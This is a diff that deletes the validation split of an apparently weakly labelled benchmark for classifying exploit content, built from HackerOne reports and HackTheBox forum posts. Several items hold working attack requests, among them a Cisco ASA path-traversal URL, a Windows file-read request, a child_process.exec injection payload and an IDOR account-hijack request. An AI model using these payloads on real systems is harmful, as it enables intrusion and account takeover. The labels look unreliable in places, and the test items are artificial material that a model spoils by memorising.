diff --git "a/benchmark/task4_hacker_exploit_labeling/val.jsonl" "b/benchmark/task4_hacker_exploit_labeling/val.jsonl" deleted file mode 100644--- "a/benchmark/task4_hacker_exploit_labeling/val.jsonl" +++ /dev/null @@ -1,1933 +0,0 @@ -{"id": "a1435fa9372f0e2dc0d3", "text": "[Forced Browsing] Remote 0click exfiltration of Safari user's IP address\n\n> NOTE! Thanks for submitting a report! Please replace *all* the [square] sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!\n\n**Summary:** A malicious actor when embedding content into Twitter content (for example, see this ████) can lookup the IP address of a user without the user consenting to loading the 3rd party domain.\n\n**Description:** When the user loads the page and doesn't click on any content Safari preloads the ad target domain (in this case ██████████). Using that, without the user tapping on the link, my server receives a TCP connection where I extract the IP and hostname of the victim. Using that information, I can lookup their approximate address, maybe spoof an IP in their city and spearphish one of their accounts, find their telco or ISP provider and use their twitter name to take over their account, many things are possible.\n\nThe problem is caused by use of remote domain links with preconnect.\n\n\n\n\nI recommend a mitigation of removing preload and preconnect for 3rd party domains.\n\nThis has huge privacy and security implications. I can remotely extract a targeted user's IP address by sending them a email, text message, or just tweeting at them. They are not aware it happened, it doesn't show up in their browser history because the user doesn't tap on the 3rd party link.\n\nOnce you have mitigated this issue I will need to notify Apple.\n\n## Steps To Reproduce:\n\n(Add details for how we can reproduce the issue)\n\n 1. I send a targeted user a link to a tweet such as https://twitter.com/██████/status/███████\n2. They use Safari to open the link\n3. When the user mouses over the image on a mac (or scrolls the screen on an iPhone) Safari will connect to ████.\n4. My server lists out incoming TCP connections.\n\n## Impact:\n\nSilently exfiltrating a user's IP address remotely opens them up to lots of attacks. You may see an egg, but I see a gateway to spear phishing the user by initiating regular MITM attack (showing the login request from the same location as the user), I see it been useful to do an account takeover via their ISP or telco. I see it useful to know when a user is at home or at work, in some cases I can tell they work at a certain company. In the case of a popular streamer it opens them up to DDOS attacks by just clicking on a \"safe\" tweet. There are huge possibilities for doxxing individuals using this exploit.\n\nYou can also target an individual (for example an individual you know is in America somewhere) through twitter ads by adding 99 twitter handles from Japan, then the target twitter handle. That way, you know when your ad is shown if it is the target because they won't be in Japan.\n\nThe only thing to bring down the impact of this attack is it is macOS and iOS Safari only. But if you don't think this attack has high severity I can demonstrate more use cases.\n\n## Supporting Material/References:\n\n * List any additional material (e.g. screenshots, logs, etc.)\n\nHere is a simple C server for logging incoming connections.\n\n```\n#include \n/* --- server.c --- */\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n\nint main(int argc, char *argv[])\n{\n\tint listenfd = 0, connfd = 0;\n\tstruct sockaddr_in serv_addr;\n\n\tchar sendBuff[1025];\n\ttime_t ticks;\n\n\t/* creates an UN-named socket inside the kernel and returns\n\t * an integer known as socket descriptor\n\t * This function takes domain/family as its first argument.\n\t * For Internet family of IPv4 addresses we use AF_INET\n\t */\n\tlistenfd = socket(AF_INET, SOCK_STREAM, 0);\n\tmemset(&serv_addr, '0', sizeof(serv_addr));\n\tmemset(sendBuff, '0', sizeof(sendBuff));\n\n\tserv_addr.sin_family = AF_INET;\n\tserv_addr.sin_addr.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fd3faab96745c5605b5c", "text": "[Privilege Escalation] EC2 subdomain takeover at http://████████/\n\nThere is a dangling DNS A record that points to an EC2 instance that no longer exists, I was able to claim the EC2 instance and host content on http://███████/.\n\n## Steps To Reproduce:\n\n 1. Visit http://█████████/██████████.html and view the PoC: ██████\n\n\n## Suggested Remediation Steps\n\n Remove the A record pointing to the current ec2 instance. \n\n## Impact\n\nHosting content on http://█████/ and potentionally fully bypassing web protections like CORS (in cases of `████████`) or redirecting users to malicious pages.\n\n## Impact\n\nHosting content on http://██████/ and potentionally fully bypassing web protections like CORS (in cases of `██████████`) or redirecting users to malicious pages,\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nVisit http://██████████/█████.html and view the PoC: █████\n\n## Suggested Mitigation/Remediation Actions\nRemove the A record pointing to the current ec2 instance.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3729708a8fa739738f41", "text": "[Business Logic Errors] CVE-2022-32207: Unpreserved file permissions\n\n## Summary:\nCurl fails to preserve file permissions when writing:\n- `CURLOPT_COOKIEJAR` database\n- `CURLOPT_ALTSVC` database\n- `CURLOPT_HSTS` database\n\nInstead the permissions is always reset to 0666 & ~umask if the file is updated.\n\nAs a result a file that was before protected against read access by other users becomes other user readable (as long as umask doesn't have bit 2 set).\nOut of these files only the `CURLOPT_COOKIEJAR` is likely to contain sensitive information.\n\nIn addition curl will replace softlink to the database with locally written database, or if the application is run privileged, specifying `\"/dev/null\"` as a file name can lead to system overwriting the special file and result in inoperable system.\n\nThis is CWE-281: Improper Preservation of Permissions\n\n## Steps To Reproduce:\n\n 1. `umask 022`\n 2. `install -m 600 /dev/null cookie.db`\n 3. `curl -b cookie.db -c cookie.db https://google.com`\n 4. `ls -l cookie.db`\n\nAt least for `CURLOPT_COOKIEJAR` this vulnerability was introduced in https://github.com/curl/curl/commit/b834890a3fa3f525cd8ef4e99554cdb4558d7e1b - this change was introduced to fix a issue https://github.com/curl/curl/issues/4914\n\n## Fix recommendations\n\nIf a file file is created and moved over a the old one, only do this if the file is regular file. Anything else is likely going to end up causing unexpected behaviour, outright failing, or if the user has high enough permissions, damage to the operating system.\n\nSafe cloning of file permissions can only be achieved if the owner / group of the file match the current user (else group permissions might be incorrect). Hence creating a new file and moving it over the old one should IMO only be attempted if the file user and group match that of the previous file.\n\nIf a method of creating a new file is still desired, something like this could be attempted to cover the most use cases:\n\n ```\n /* If old file is a regular file attempt creating a new file with same ownership */\n struct stat st;\n if (stat(filename, &st) != -1 && S_ISREG(st.st_mode)) {\n FILE *file;\n int fd;\n struct stat nst;\n fd = open(tempstore, O_CREAT | O_EXCL, 0700);\n if (fd == -1)\n goto fail;\n if (fstat(fd, &nst) == -1 ||\n nst.st_uid != st.st_uid || nst.st_gid != st.st_gid) {\n /* newly created file doesn't have same ownership, we can't proceed safely */\n close(fd);\n unlink(tempstore);\n goto fail; // or perhaps try direct write instead?\n }\n /* use same mode as old file */\n if (fchmod(fd, st.st_mode) == -1) {\n close(fd);\n unlink(tempstore);\n goto fail;\n }\n file = fdopen(fd, FOPEN_WRITETEXT);\n if (!file) {\n close(fd);\n unlink(tempstore);\n goto fail;\n }\n /* write to file */\n /* if successful move file over filename etc */\n }\n else  {\n /* use direct file write */\n }\n ```\n\n## Impact\n\nLeak of sensitive information", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-32207"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ced4695ce3cd956062d5", "text": "[Path Traversal] [CVE-2020-3452] on ███████\n\nThe following subdomain is vulnerable to CVE-2020-3452, which is an unauthenticated file read in Cisco ASA & Cisco Firepower.\n\n# URL:\nhttps://████/\n\n# Vulnerable URL:\nhttps://███/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n██████████\n\n# Resources:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nThe vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n* Go to https://██████/+CSCOE+/logon.html\n* Intercept the request with Burpsuite\n* Send the request to Repeater\n* Change the URL path to the following `/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../as` an example to read \"/+CSCOE+/portal_inc.lua\" file.\n* You will get the portal_inc.lua file\n\n## Suggested Mitigation/Remediation Actions", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3452"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "67372289d9a433efb183", "text": "greetings, I am looking for a laptop that has a build in wifi that has the capability of monitor/injection . I purchased a ALFFA AWUs036ACS wifi adapter and for the love god i cannot figure why it is not working with Kali Linux. I have search online for solutions but none so far has helped. So i am so frustrated that i would rather buy a laptop that has Kali with a working wifi out of the box", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2023-10-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4c7e8a6257bbfebf7529", "text": "[Code Injection] Synthetics Recorder: Code injection when recording website with malicious content\n\n## Summary\n\nHello team! Synthetics recorder has a `quote` function to escape user-controlled input, but in one particular scenario the escaping isn't enough and a malicious website can inject arbitrary code in the recorder session.\n\n## Description\n\nThe `waitForNavigation` event calls `quote` within the context of a multi-line comment (`/* ... */`) so we can break out of that without using the escaped characters ([reference](https://github.com/elastic/synthetics-recorder/blob/v0.0.1-beta.3/electron/syntheticsGenerator.ts#L217=))\n\nIn a normal situation the code generated looks like this for a navigation event to `https://example.com`\n\n```javascript\n page.waitForNavigation(/*{ url: 'https://example.com' }*/),\n```\n\nbut it's possible to escape out of the comment without using single quotes (which would be escaped) with a specially crafted URL like `https://example.com?q=*/require(`child_process`).exec(`touch$IFS/tmp/haxx`)/*`\n\n```javascript\n page.waitForNavigation(/*{ url: 'https://example.com?q=*/require(`child_process`).exec(`touch$IFS/tmp/dee-see`)/*' }*/),\n```\n\nThe syntax highlighting here on HackerOne helps visualizing how that works. `$IFS` is used because spaces get encoded to `%20`.\n\nIt's possible to have code execution when the victim uses the `test` feature inside of the synthetic recorder but the code we're allowed to use is fairly limited because the `require` function isn't available. The maximum impact is when the user saves the recorded session as a project and executes it using the synthetic runner.\n\n## Steps To Reproduce\n\n### Preparation\n\nInstall the synthetics recorder (See https://github.com/elastic/synthetics-recorder/, I'm following the instructions to run it in development mode (`nvm install; nvm use; npm install; npm run dev`) but you could also download the binary on the releases page)\n\n### Reproduction\n\n1. Start Synthetics Recorder and enter `http://deesee.xyz:4567` in the text box where it says \"Enter a Starting URL\"\n1. Click \"Start Recording\"\n1. A browser has opened, this website is a modified clone of my blog. Click the GitLab icon in the top right\n\n {F1820934}\n\n1. Close the browser window\n\n In a normal Synthetics Recorder session there would be much more steps to record but here we only did what's necessary to trigger the issue.\n\n1. Click the \"Export\" button and you'll see this code\n\n ```javascript\n step('Go to http://deesee.xyz:4567/', async () => {\n await page.goto('http://deesee.xyz:4567/');\n await Promise.all([\n page.waitForNavigation(/*{ url: 'https://gitlab.com/dee-see?query=*/require(`child_process`).exec(`touch$IFS/tmp/dee-see`)/*' }*/),\n page.click('[aria-label=\"GitLab\"] svg')\n ]);\n });\n ```\n\n We can see the payload is in place. It's fairly obvious because we only recorded one step, but in a long recording session it would be buried deeper.\n\n1. Click the \"Export\" button and save the file in a directory\n1. In that directory run `npm init -y; npm install @elastic/synthetics; npx @elastic/synthetics .`\n1. When the tests finished running observe that the `touch /tmp/dee-see` command ran\n\nThose last steps seem contrived, but that's how a synthetics test suite is setup and how a developer would make sure the session they just recorded would be integrated into their builds and whatnot.\n\n## Supporting Material/References:\n\n{F1820942}\n\n## CVSS\n\nConfidentiality and Integrity impact are High because of the arbitrary command execution. I also included Availability impact because those commands can shut down the system. I will concede though that Attack Complexity could be \"very high\" if that existed on the Attack Complexity scale. :)\n\n## Impact\n\nSomeone with control over the website's content can run arbitrary code where ever the synthetics recorded session will be re-executed.\n\nDeveloper computers and CI systems come to mind. The most realistic attack scenario would be privilege escalation from within a company.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "628965d7b308c6d9fa1f", "text": "It’s awesome that you’re diving into the world of Penetration Testing and tackling those CTF challenges. They can be mind-bending, right?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "51dc3d429d4301b21444", "text": "[Information Disclosure] The dashboard is exposed in https://███\n\n**Description:**\nAt first, hello, after searching in sub-domains, the dashboard was accessed by Google Dorking Which is supposed to be protected\nhttps://█████████l/arsys/forms/arpcp/ARPC%3AWeb%3AHier%3ADashboard/Default+Admin+View/?F536871388=1&mode=Submit&cacheid=c66791da\n\n## References\nhttps://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure\n\n## Impact\n\nCWE-200\nhttps://cwe.mitre.org/data/definitions/200.html\n\n## System Host(s)\n█████████l\n\n## Affected Product(s) and Version(s)\nwebsite\n\n## CVE Numbers\nCVE-2020-7130\n\n## Steps to Reproduce\nAfter searching in Google dorking on a file extension or endpoint jspDashboard found in the URL\nhttps://████████l/arsys/forms/arpcp/ARPC%3AWeb%3AHier%3ADashboard/Default+Admin+View/?F536871388=1&mode=Submit&cacheid=c66791da \n██████\n\n==Note==\n that it is leaked, you can log out and bypass it by typing anything in the ```username``` box\n\n## Suggested Mitigation/Remediation Actions\nCollect sensitive information on a local server and protect endpoints\n\n\n---------------------------------------\nWith best regards and love\nToni...", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-7130"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9949d3af940bda6f8f08", "text": "use the command tasklist as indicated in the question. you got the rest right (almost)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-12-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8acb9d8f9e08ac3f1b3e", "text": "Hi, How did you get the result of Harry is 1337?. What method did you used?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-03-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "78faf5e23069ae8cb2b1", "text": "[Open Redirect] Open Redirect on www.redditinc.com via `failed` query param\n\nhello dear support\n\nI have found the issue on https://www.redditinc.com/ama\n\nHTTP request \n\nPOST /ama HTTP/1.1\nContent-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw\nCookie: CRAFT_CSRF_TOKEN=958b77eaad06452d68f0be48c5edf5b0d928b51a6c4afbb5f2f95397f18b43e2a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22jZdkLxGgRNVPWIF2OyxH-Lig9pTukLSS8OxYOVST%22%3B%7D;OptanonAlertBoxClosed=2021-07-12T01:35:46.350Z;OptanonConsent=isIABGlobal=false&datestamp=Mon+Jul+12+2021+04%3A35%3A46+GMT%2B0300+(Arabian+Standard+Time)&version=6.13.0&hosts=&consentId=71f221d5-8a57-4a90-9844-0a863bfc837d&interactionCount=2&landingPath=NotLandingPage&groups=C0001%3A1%2CC0002%3A1%2CC0004%3A1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Encoding: gzip,deflate\nContent-Length: 1508\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36\nHost: www.redditinc.com\nConnection: Keep-alive\n\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"action\"\n\nzendesk/default/submit\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"agreement\"\n\nyes\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"description\"\n\n555\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email\"\n\nsample@email.tst\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"email_confirm\"\n\nsample@email.tst\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"failed\"\n\nhttp://xfs.bxss.me\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"name\"\n\npHqghUme\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"organization\"\n\nAcunetix\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"participants\"\n\npHqghUme\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"redirect\"\n\n74bcbfb4f9c047fb4e467dd203ca3b30f2b31216551ab9db2bf44911c029d506thank-you/ama-form-step-1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"subject\"\n\nAMA Request\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"success\"\n\nthank-you/ama-form-step-1\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"ticket_form_id\"\n\n360000307211\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"timeframe\"\n\nnext-week\n------------YWJkMTQzNDcw\nContent-Disposition: form-data; name=\"timezone\"\n\n(GMT-05:00) Eastern Time (US & Canada)\n------------YWJkMTQzNDcw--\n===============================================================\n\nvuln here :Content-Disposition: form-data; name=\"failed\"\n\nhttp://xfs.bxss.me\n------------YWJkMTQzNDcw\n\nCSRF PoC\n\n \n \n \n
\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dfc562a8d90a0f070475", "text": "[Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')] Race condition on https://judge.me/people\n\n##summary:An attacker can increase the followers of the users of judge.me\n\nTools required : \n1.burpsuit\n2.turbo intruder\n\n##steps to reproduce:\n1.visit https://judge.me/people\n2.like a user and intercept the request\n3.now send it to turbo intruder and configure the script to \n race.py\n\n## Impact\n\nThe attacker can increase their followers in a bad way by creating fake followers", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c0aa4dc1ba51bf06e80e", "text": "[SQL Injection] GitHub Security Lab (GHSL) Vulnerability Report: SQLInjection in FileContentProvider.kt (GHSL-2022-059)\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [Owncloud Android app](https://github.com/owncloud/android).\n\nWe are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2022-059` or `GHSL-2022-060` as a reference).\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nThe Owncloud Android app uses [content providers](https://developer.android.com/guide/topics/providers/content-provider-basics) to manage its data. The provider `FileContentProvider` has SQL injection vulnerabilities that allows malicious applications or users in the same device to obtain internal information of the app.\n\n## Details \n\nThe `FileContentProvider` provider is exported, as can be seen in the Android Manifest:\n\n[`AndroidManifest.xml:153`](https://github.com/owncloud/android/blob/73f152c242dd818b9c4de267fe072338a35ff2ba/owncloudApp/src/main/AndroidManifest.xml#L153)\n\n```xml\n\n```\nAll tables in this content provider can be freely interacted with by other apps in the same device. By reviewing the entry-points of the content provider for those tables, it can be seen that several parameters containing user input end up reaching an unsafe SQL method that allows for SQL injection.\n\n## The `delete` method\n\nUser input enters the content provider through the three parameters of this method:\n\n[`FileContentProvider.kt:85`](https://github.com/owncloud/android/blob/73f152c242dd818b9c4de267fe072338a35ff2ba/owncloudApp/src/main/java/com/owncloud/android/providers/FileContentProvider.kt#L85)\n```kt\noverride fun delete(uri: Uri, where: String?, whereArgs: Array?): Int {\n```\n\nThe `where` parameter reaches the following dangerous arguments without sanitization:\n\n[`FileContentProvider.kt:102`](https://github.com/owncloud/android/blob/73f152c242dd818b9c4de267fe072338a35ff2ba/owncloudApp/src/main/java/com/owncloud/android/providers/FileContentProvider.kt#L102)\n\n```kt\nprivate fun delete(db: SQLiteDatabase, uri: Uri, where: String?, whereArgs: Array?): Int {\n // --snip--\n when (uriMatcher.match(uri)) {\n SINGLE_FILE -> {\n // --snip--\n count = db.delete(\n ProviderTableMeta.FILE_TABLE_NAME,\n ProviderTableMeta._ID +\n \"=\" +\n uri.pathSegments[1] +\n if (!TextUtils.isEmpty(where))\n \" AND ($where)\" // injection\n else\n \"\", whereArgs\n )\n }\n DIRECTORY -> {\n // --snip--\n count += db.delete(\n ProviderTableMeta.FILE_TABLE_NAME,\n ProviderTableMeta._ID + \"=\" +\n uri.pathSegments[1] +\n if (!TextUtils.isEmpty(where))\n \" AND ($where)\" // injection\n else\n \"\", whereArgs\n )\n }\n ROOT_DIRECTORY ->\n count = db.delete(ProviderTableMeta.FILE_TABLE_NAME, where, whereArgs) // injection\n SHARES -> count =\n OwncloudDatabase.getDatabase(MainApp.appContext).shareDao().deleteShare(uri.pathSegments[1])\n CAPABILITIES -> count = db.delete(ProviderTableMeta.CAPABILITIES_TABLE_NAME, where, whereArgs) // injection\n UPLOADS -> count = db.delete(ProviderTableMeta.UPLOADS_TABLE_NAME, whe", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "42cf3104a0361c501f01", "text": "Hello, I’m stuck in Packet Inception, Dissecting Network Traffic With Wireshark. I have to connect to a target machine with Nomachine to launch Wireshark, but I can’t find the target IP. It is not shown in the connection instructions and all the IP I’ve tried in the Wireshark-Lab-2-Resources are not reachable from the Pwnbox. If someone could provide me some help it would be great. Regards,", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-04-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6bc6d187e2431848d482", "text": "[Cleartext Storage of Sensitive Information] Password disclosure in initial setup of Mail App\n\n## Summary:\nhttps://github.com/nextcloud/mail/issues/823\n\n## Steps To Reproduce:\nhttps://github.com/nextcloud/mail/issues/823\n\n## Impact\n\nComplete access to a IMAP account and possibly if the password is the same for the NC account, complete account control.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "264a13ece136183b79df", "text": "You have the ip address, you need the domain name - so dig it", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-09-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "11b9f0e239d8ec64975d", "text": "Thanks, I got this worked out yesterday using a different win32 class other than BIOS. I am not sure if that is the same thing that you are referring to as your answer is masked as it is too direct of an answer. Thanks for much for helping though!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "827b551eee34ea35e5f1", "text": "[Path Traversal] Directory Traversal at █████\n\nHi DoD!\n\nI found directory traversal vulnerability at ████. I didn't find available title for this issue that's why I selected remote file inclusion.\n\n### Host: ██████\n### Vulnerability: Directory Traversal in Windows Server\n### Tool Used: BurpSuite\n\n### Parameter: ==path==\n\n###HTTP GET Request###\n==GET /File/Download?path=C:/WINDOWS/System32/drivers/etc/hosts==\n\n### Response\n\n███\n\n## Impact\n\nAttacker could read sensitive file in server\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nMake HTTP Request like that;\n\nGET /File/Download?path=C:/WINDOWS/System32/drivers/etc/hosts HTTP/1.1\nHost: ███\nCookie: .AspNetCore.Antiforgery.GupjSGuR2ZQ=CfDJ8GfYfRi9j8NNoBU6zVTpTKTbaG72CuADzxVVYVr9efssbxXYtgzCMF2H6PvdOcF0RxMExCsaObiVNuop1ouJa2Nb0k3z4KYTy2ih_nRbxREcZZo-3LBJPXq05kvRrRF6p02TakoqGzC6VUTdPRw-bo8; TimeZoneOffset=-240\nCache-Control: max-age=0\nSec-Ch-Ua: \"Chromium\";v=\"103\", \".Not/A)Brand\";v=\"99\"\nSec-Ch-Ua-Mobile: ?0\nSec-Ch-Ua-Platform: \"macOS\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n## Suggested Mitigation/Remediation Actions\nInput Validation for path parameter", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fdded81e98f09557c69e", "text": "image 1267×843 227 KB having similar issue, its taking longer than the time laps given for the ip and port needing help for mking the passlist", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-04-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f3bc9288a8f10cb04633", "text": "[Insecure Direct Object Reference (IDOR)] IDOR ' can change any account email and cannot retrieve his account and access it ' at https://www.miroyalcanin.cl/\n\nhi team\ni found IDOR , i can change any account email and he cannot retrieve his account and access it easily.\n\ni can't access to his account because url activation on new email don't work and give me error.\n\n```\nSyntaxError: JSON.parse: unexpected character at line 1 column 1 of the JSON data\n```\nbut hackers will be able to disable access users to their account on the site.\n\n 1. Go to registration page (https://www.miroyalcanin.cl/)\n 2. Verified your account.\n 3. Go to login page and login your account.\n\n\n For the fastly test, use this credentials to login (you can use this account attacker to send request to burp and test on victim's account's i was created) \n\n * For Attacker\n\nyojikox125@raotus.com\nPassword\nidUsuario : 88795\n\n * For Victim 1\n\nnomodab161@ippals.com\nPassword\nidUsuario : 88805\n\n * For Victim 2\n\nhogev48627@hrisland.com\nPassword\nidUsuario : 88806\n\n * For Victim 3\n\nrodevo8336@fitzola.com\nPassword\nidUsuario : 88807\n\ni access to my account victim and i go to edit my profil and send request to burp to get id user for this account ( my method of video for the attacker account is the same that i did on the victim account to get her id user ).\n\nso .. after login i go to edit my account attacker and send request to burp and send it to repeater .. i change my id to victim id and i change email to my new email and click send so i succeeded.\n\ni received an activation message on my new email i click on active url .. despite give me an error message when i click on the link activation\n```\nSyntaxError: JSON.parse: unexpected character at line 1 column 1 of the JSON data\n```\nthe change was made successfully and the victim cannot log into his account, as it will give him an error message when he logs in.\n\ni created +5 account victim for testing that and its worked, and can kids hackers to change the id user to anything like 10 or 100 or any number and change email this account for that id user.\n\nburp request\n```\nPOST /_post/usuario_actualizar.php HTTP/1.1\nHost: www.miroyalcanin.cl\nCookie: OptanonConsent=isGpcEnabled=0&datestamp=Tue+Apr+18+2023+10%3A23%3A38+GMT-0400+(Eastern+Daylight+Time)&version=6.34.0&isIABGlobal=false&hosts=&landingPath=NotLandingPage&groups=1%3A1%2C2%3A1%2C4%3A1&AwaitingReconsent=false&geolocation=%3B; _ga=GA1.2.174329567.1679079573; OptanonAlertBoxClosed=2023-03-28T14:53:23.642Z; _gcl_au=1.1.1072294252.1680015205; _ga_BYDNNWSXGT=GS1.1.1681825645.9.1.1681827819.0.0.0; _gid=GA1.2.1653803706.1681778533; usr_idUsuario=88795; _cs_mk_ga=0.10453828872716586_1681827591176; _gat_gtag_UA_96920920_3=1; _gat_UA-52712959-1=1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://www.miroyalcanin.cl/mi-perfil-edicion\nContent-Type: multipart/form-data; boundary=---------------------------297392175112058187932062474594\nContent-Length: 2851\nOrigin: https://www.miroyalcanin.cl\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: iframe\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: same-origin\nSec-Fetch-User: ?1\nTe: trailers\nConnection: close\n\n-----------------------------297392175112058187932062474594\nContent-Disposition: form-data; name=\"nombre\"\n\nattacker\n-----------------------------297392175112058187932062474594\nContent-Disposition: form-data; name=\"apellido\"\n\nattacker\n-----------------------------297392175112058187932062474594\nContent-Disposition: form-data; name=\"email\"\n\nteyin79347@momoshe.com\n-----------------------------297392175112058187932062474594\nContent-Disposition: form-data; name=\"rut\"\n\n\n-----------------------------297392175112058187932062474594\nContent-Disposition: form-data; 